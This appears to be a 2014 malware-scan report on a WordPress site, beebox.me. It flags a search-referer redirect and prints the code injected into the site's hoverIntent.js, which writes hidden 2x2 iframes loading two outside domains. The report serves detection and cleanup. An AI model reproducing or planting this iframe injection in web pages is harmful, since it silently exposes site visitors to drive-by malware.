Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://beebox.me/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: beebox.me Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Thu, 22 May 2014 02:17:04 GMT Location: http://awlstyle.com/awwd.html?h=3206241 Server: Apache Content-Length: 282 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://beebox.me/ | 200 OK Content-Length: 13910 Content-Type: text/html | clean |
http://78.47.243.148/chrome/ | 404 Not Found Content-Length: 205 Content-Type: text/html | clean |
http://78.47.243.148/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://beebox.me/wp-includes/js/jquery/jquery.js?ver=1.7.1 | 200 OK Content-Length: 93889 Content-Type: application/x-javascript | clean |
http://beebox.me/wp-content/plugins/dropdown-menu-widget/scripts/include.js?ver=3.3.1 | 200 OK Content-Length: 386 Content-Type: application/x-javascript | clean |
http://beebox.me/wp-content/themes/apz/includes/js/jquery.easing.min.js?ver=3.3.1 | 200 OK Content-Length: 4757 Content-Type: application/x-javascript | clean |
http://beebox.me/wp-content/themes/apz/includes/js/loopedSlider.js?ver=3.3.1 | 200 OK Content-Length: 8341 Content-Type: application/x-javascript | clean |
http://beebox.me/wp-content/themes/apz/includes/js/superfish.js?ver=3.3.1 | 200 OK Content-Length: 3789 Content-Type: application/x-javascript | clean |
http://beebox.me/wp-content/themes/apz/includes/js/woo_tabs.js?ver=3.3.1 | 200 OK Content-Length: 1073 Content-Type: application/x-javascript | clean |
http://beebox.me/wp-content/themes/apz/includes/js/general.js?ver=3.3.1 | 200 OK Content-Length: 1595 Content-Type: application/x-javascript | clean |
http://beebox.me/wp-includes/js/hoverIntent.js?ver=20090102 | 200 OK Content-Length: 1654 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://awlstyle.com/awwd.html?j=3206241></iframe>');
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gradneyvistica.com/cwzf.html?j=3206241></iframe>'); (function(a){a.fn.hoverIntent=function(l,j){var m={sensitivity:7,interval:100,timeout:0};m=a.extend(m,j?{over:l,out:j}:l);var o,n,h,d;var e= Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://awlstyle.com/awwd.html?j=3206241 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://awlstyle.com/awwd.html?j=3206241> Hidden iFrame found. size: 2x2 src: http://gradneyvistica.com/cwzf.html?j=3206241 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://gradneyvistica.com/cwzf.html?j=3206241> | ||
http://beebox.me/wp-includes/js/thickbox/thickbox.js?ver=3.1-20111117 | 200 OK Content-Length: 12501 Content-Type: application/x-javascript | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=beebox.me
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://beebox.me/
Result: beebox.me is not infected or malware details are not published yet.
Result: beebox.me is not infected or malware details are not published yet.